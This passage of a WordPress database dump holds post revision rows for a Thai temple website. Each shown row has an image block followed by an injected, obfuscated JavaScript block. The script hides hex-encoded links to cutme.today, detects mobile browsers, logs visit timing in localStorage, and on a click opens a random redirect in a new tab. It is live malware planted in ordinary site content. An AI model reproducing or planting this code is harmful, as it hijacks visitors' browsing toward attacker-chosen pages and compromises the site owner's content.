\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','inherit','closed','closed','','306-revision-v1','','','2024-08-30 10:39:44','2024-08-30 03:39:44','',306,'http://watprato.ssk.in.th/?p=321',0,'revision','',0),
(323,2,'2024-08-30 10:40:13','2024-08-30 03:40:13','<!-- wp:generateblocks/container {\"uniqueId\":\"942fbcb5\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":319,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/ปลูกต้นไม้-1-724x1024.jpg\" alt=\"\" class=\"wp-image-319\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','inherit','closed','closed','','306-revision-v1','','','2024-08-30 10:40:13','2024-08-30 03:40:13','',306,'http://watprato.ssk.in.th/?p=323',0,'revision','',0),
(324,2,'2024-08-30 10:40:16','2024-08-30 03:40:16','<!-- wp:generateblocks/container {\"uniqueId\":\"942fbcb5\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":319,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/ปลูกต้นไม้-1-724x1024.jpg\" alt=\"\" class=\"wp-image-319\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 